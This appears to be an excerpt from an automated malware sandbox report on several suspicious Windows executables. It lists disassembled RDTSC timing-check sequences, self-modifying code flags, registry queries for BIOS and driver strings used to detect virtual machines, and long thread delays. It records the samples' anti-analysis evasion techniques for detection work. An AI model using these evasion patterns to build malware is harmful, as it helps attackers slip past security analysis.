                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49002DB second address: 49002F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EE4h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49002F3 second address: 4900317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov di, ax 0x0000000d mov dh, ah 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F01B44E8C9Bh 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b mov dx, si 0x0000001e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4900317 second address: 490031B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 490031B second address: 490034F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, dword ptr [ebp+08h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F01B44E8CA2h 0x00000013 sbb ax, 56E8h 0x00000018 jmp 00007F01B44E8C9Bh 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 490034F second address: 4900372 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 mov edx, esi 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4900372 second address: 4900378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4900378 second address: 490037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 490037C second address: 4900380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4900380 second address: 490038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 490038F second address: 4900393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4900393 second address: 4900399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4900399 second address: 49003B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA9h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49003EF second address: 49003FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49003FE second address: 492030E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b jmp 00007F01B44E8C9Eh 0x00000010 mov ecx, esi 0x00000012 jmp 00007F01B44E8CA0h 0x00000017 or ecx, edx 0x00000019 jmp 00007F01B44E8CA0h 0x0000001e je 00007F0226B6CD66h 0x00000024 pushad 0x00000025 movzx eax, bx 0x00000028 mov bh, AFh 0x0000002a popad 0x0000002b mov eax, dword ptr [esi+00000088h] 0x00000031 pushad 0x00000032 call 00007F01B44E8CA0h 0x00000037 mov ch, B8h 0x00000039 pop ebx 0x0000003a mov dx, si 0x0000003d popad 0x0000003e or eax, dword ptr [esi+0000008Ch] 0x00000044 jmp 00007F01B44E8CA6h 0x00000049 jmp 00007F0226B6CCFCh 0x0000004e jne 00007F01B44E8CA3h 0x00000050 test byte ptr [esi+11h], 00000010h 0x00000054 jne 00007F01B44E8C9Dh 0x00000056 mov eax, dword ptr [esi+38h] 0x00000059 or eax, dword ptr [esi+3Ch] 0x0000005c jne 00007F01B44E8C95h 0x0000005e inc eax 0x0000005f jmp 00007F01B44E8C9Dh 0x00000061 pop esi 0x00000062 pop ebp 0x00000063 retn 0004h 0x00000066 push 00000000h 0x00000068 push 00000000h 0x0000006a push 00000000h 0x0000006c lea eax, dword ptr [ebp-20h] 0x0000006f push eax 0x00000070 call 00007F01B44EA7C5h 0x00000075 jmp 00007F01B8A05E73h 0x0000007a mov edi, edi 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007F01B44E8C9Fh 0x00000083 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492030E second address: 4920316 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920316 second address: 4920398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov bx, ax 0x0000000c call 00007F01B44E8CA6h 0x00000011 mov cx, 6B91h 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F01B44E8C9Dh 0x0000001f mov ebp, esp 0x00000021 jmp 00007F01B44E8C9Eh 0x00000026 mov edx, dword ptr [ebp+10h] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F01B44E8C9Eh 0x00000030 sub cx, 8B48h 0x00000035 jmp 00007F01B44E8C9Bh 0x0000003a popfd 0x0000003b mov dh, ah 0x0000003d popad 0x0000003e sub esp, 20h 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F01B44E8C9Eh 0x00000048 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920398 second address: 492039E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492039E second address: 4920425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+14h] 0x0000000b jmp 00007F01B44E8CA9h 0x00000010 mov eax, edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F01B44E8C9Ch 0x00000019 and eax, 7EAD3B38h 0x0000001f jmp 00007F01B44E8C9Bh 0x00000024 popfd 0x00000025 jmp 00007F01B44E8CA8h 0x0000002a popad 0x0000002b or eax, ecx 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushfd 0x00000031 jmp 00007F01B44E8C9Ch 0x00000036 jmp 00007F01B44E8CA5h 0x0000003b popfd 0x0000003c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920425 second address: 4920462 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F01B4D45EE0h 0x00000008 and ch, 00000028h 0x0000000b jmp 00007F01B4D45EDBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 mov dl, C5h 0x00000016 pop eax 0x00000017 popad 0x00000018 push esp 0x00000019 jmp 00007F01B4D45EDCh 0x0000001e mov dword ptr [esp], esi 0x00000021 pushad 0x00000022 push esi 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920462 second address: 49204DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 mov bx, F12Ah 0x0000000a pop edi 0x0000000b popad 0x0000000c mov esi, FFFE0000h 0x00000011 pushad 0x00000012 movzx eax, bx 0x00000015 pushfd 0x00000016 jmp 00007F01B44E8CA9h 0x0000001b sub ecx, 4A27A756h 0x00000021 jmp 00007F01B44E8CA1h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, edi 0x00000029 pushad 0x0000002a mov bh, ch 0x0000002c pushad 0x0000002d movsx edi, ax 0x00000030 mov ch, D9h 0x00000032 popad 0x00000033 popad 0x00000034 push eax 0x00000035 jmp 00007F01B44E8C9Ah 0x0000003a xchg eax, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F01B44E8CA7h 0x00000042 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49204DB second address: 49204E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49204E1 second address: 49204E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49204E5 second address: 4920521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F01B4D45EE8h 0x00000013 sub esi, 405BB568h 0x00000019 jmp 00007F01B4D45EDBh 0x0000001e popfd 0x0000001f movzx eax, di 0x00000022 popad 0x00000023 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920521 second address: 4920527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920527 second address: 492052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492052B second address: 492057F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F0226B6413Ah 0x00000011 pushad 0x00000012 mov eax, 246AB19Dh 0x00000017 pushfd 0x00000018 jmp 00007F01B44E8C9Ah 0x0000001d and al, FFFFFFF8h 0x00000020 jmp 00007F01B44E8C9Bh 0x00000025 popfd 0x00000026 popad 0x00000027 mov esi, dword ptr fs:[00000018h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F01B44E8CA0h 0x00000037 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492057F second address: 4920583 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920583 second address: 4920589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920589 second address: 492059A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EDDh 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492059A second address: 492059E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492059E second address: 49205D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+00000FDCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dl, ch 0x00000013 pushfd 0x00000014 jmp 00007F01B4D45EDBh 0x00000019 jmp 00007F01B4D45EE3h 0x0000001e popfd 0x0000001f popad 0x00000020 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49205D2 second address: 49205EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA4h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920717 second address: 492071D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492071D second address: 4920721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920721 second address: 4920725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920725 second address: 492079B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov bx, ax 0x0000000d pushfd 0x0000000e jmp 00007F01B44E8CA6h 0x00000013 sub cx, C6A8h 0x00000018 jmp 00007F01B44E8C9Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esp], edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 push edi 0x00000026 pop ecx 0x00000027 pushfd 0x00000028 jmp 00007F01B44E8CA7h 0x0000002d or ax, 6C9Eh 0x00000032 jmp 00007F01B44E8CA9h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492079B second address: 49207D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007F01B4D45EDEh 0x00000011 xchg eax, esi 0x00000012 jmp 00007F01B4D45EE0h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49207D9 second address: 49207DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49207DD second address: 49207E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49207E1 second address: 49207E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49207E7 second address: 4920812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F01B4D45EE5h 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920876 second address: 492088D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a cmp dword ptr [76FF459Ch], 05h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492088D second address: 4920893 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920893 second address: 4920899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920899 second address: 492089D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492089D second address: 49208E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b jmp 00007F01B44E8C9Ch 0x00000010 popad 0x00000011 mov dword ptr [ebp-04h], edi 0x00000014 jmp 00007F01B44E8CA0h 0x00000019 je 00007F0226B63E55h 0x0000001f pushad 0x00000020 mov edi, ecx 0x00000022 mov bh, ah 0x00000024 popad 0x00000025 mov ecx, dword ptr [esi+04h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F01B44E8CA0h 0x0000002f rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49208E9 second address: 4920922 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F01B4D45EE6h 0x0000000f push eax 0x00000010 jmp 00007F01B4D45EDBh 0x00000015 xchg eax, ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920922 second address: 4920926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920926 second address: 492092A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492092A second address: 4920930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920930 second address: 492094D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EE9h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492094D second address: 492097D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea ebx, dword ptr [esi+08h] 0x0000000e jmp 00007F01B44E8C9Eh 0x00000013 mov edx, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492097D second address: 4920981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920981 second address: 492099E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 492099E second address: 49209DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007F0227398D1Dh 0x00000010 mov edi, edi 0x00000012 push ebp 0x00000013 mov ebp, esp 0x00000015 push ecx 0x00000016 push esi 0x00000017 mov esi, edx 0x00000019 push edi 0x0000001a cmp ecx, 00000107h 0x00000020 jbe 00007F01B4D45EEEh 0x00000022 sub ecx, 0000010Fh 0x00000028 je 00007F01B4D45F08h 0x0000002a sub ecx, 11h 0x0000002d je 00007F01B4D45F03h 0x0000002f sub ecx, 00000166h 0x00000035 je 00007F01B4D45EFBh 0x00000037 xor eax, eax 0x00000039 pop edi 0x0000003a inc eax 0x0000003b pop esi 0x0000003c leave 0x0000003d ret 0x0000003e jmp 00007F01B4D45EE2h 0x00000043 test eax, eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F01B4D45EE7h 0x0000004c rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49209DB second address: 49209F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8CA4h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49209F3 second address: 49209F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 49209F7 second address: 4920A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0226B3BA83h 0x0000000e jmp 00007F01B44E8CA7h 0x00000013 mov eax, dword ptr [76FF4C30h] 0x00000018 jmp 00007F01B44E8CA6h 0x0000001d mov edx, dword ptr [ebx] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F01B44E8CA7h 0x00000026 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920A52 second address: 4920A57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920A57 second address: 4920A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F01B44E8CA5h 0x0000000a adc ecx, 659EEB96h 0x00000010 jmp 00007F01B44E8CA1h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test byte ptr [eax], 00000002h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F01B44E8C9Dh 0x00000023 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exeRDTSC instruction interceptor: First address: 4920A9E second address: 4920AC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F02273C0EE5h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F01B4D45EDDh 0x00000016 rdtsc
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Special instruction interceptor: First address: 40BAAA instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Special instruction interceptor: First address: 5B184B instructions caused by: Self-modifying code
                          Source: C:\ProgramData\giab\fvvb.exe | Special instruction interceptor: First address: 40BAAA instructions caused by: Self-modifying code
                          Source: C:\ProgramData\giab\fvvb.exe | Special instruction interceptor: First address: 5B184B instructions caused by: Self-modifying code
                          Source: C:\ProgramData\giab\fvvb.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\ProgramData\giab\fvvb.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\ProgramData\giab\fvvb.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | Code function: 5_2_04920C2D rdtsc 5_2_04920C2D
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 360000
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Thread delayed: delay time: 360000
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Window / User API: threadDelayed 9660
                          Source: C:\ProgramData\giab\fvvb.exe | Window / User API: threadDelayed 1069
                          Source: C:\ProgramData\giab\fvvb.exe | Window / User API: threadDelayed 1178
                          Source: C:\ProgramData\giab\fvvb.exe | Window / User API: threadDelayed 946
                          Source: C:\ProgramData\giab\fvvb.exe | Window / User API: threadDelayed 1383
                          Source: C:\ProgramData\giab\fvvb.exe | Window / User API: threadDelayed 1071
                          Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | API coverage: 4.4 %
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | API coverage: 1.9 %
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7528 | Thread sleep count: 9660 > 30
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7528 | Thread sleep time: -289800000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7552 | Thread sleep time: -1080000s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 7548 | Thread sleep time: -720000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe TID: 7768 | Thread sleep time: -60000s >= -30000s
                          Source: C:\ProgramData\giab\fvvb.exe TID: 7944 | Thread sleep time: -2139069s >= -30000s
                          Source: C:\ProgramData\giab\fvvb.exe TID: 7952 | Thread sleep time: -120060s >= -30000s
                          Source: C:\ProgramData\giab\fvvb.exe TID: 7908 | Thread sleep time: -60000s >= -30000s
                          Source: C:\ProgramData\giab\fvvb.exe TID: 7928 | Thread sleep time: -2357178s >= -30000s
                          Source: C:\ProgramData\giab\fvvb.exe TID: 7924 | Thread sleep time: -1892946s >= -30000s
                          Source: C:\ProgramData\giab\fvvb.exe TID: 7932 | Thread sleep time: -2767383s >= -30000s
                          Source: C:\ProgramData\giab\fvvb.exe TID: 7936 | Thread sleep time: -2143071s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Last function: Thread delayed
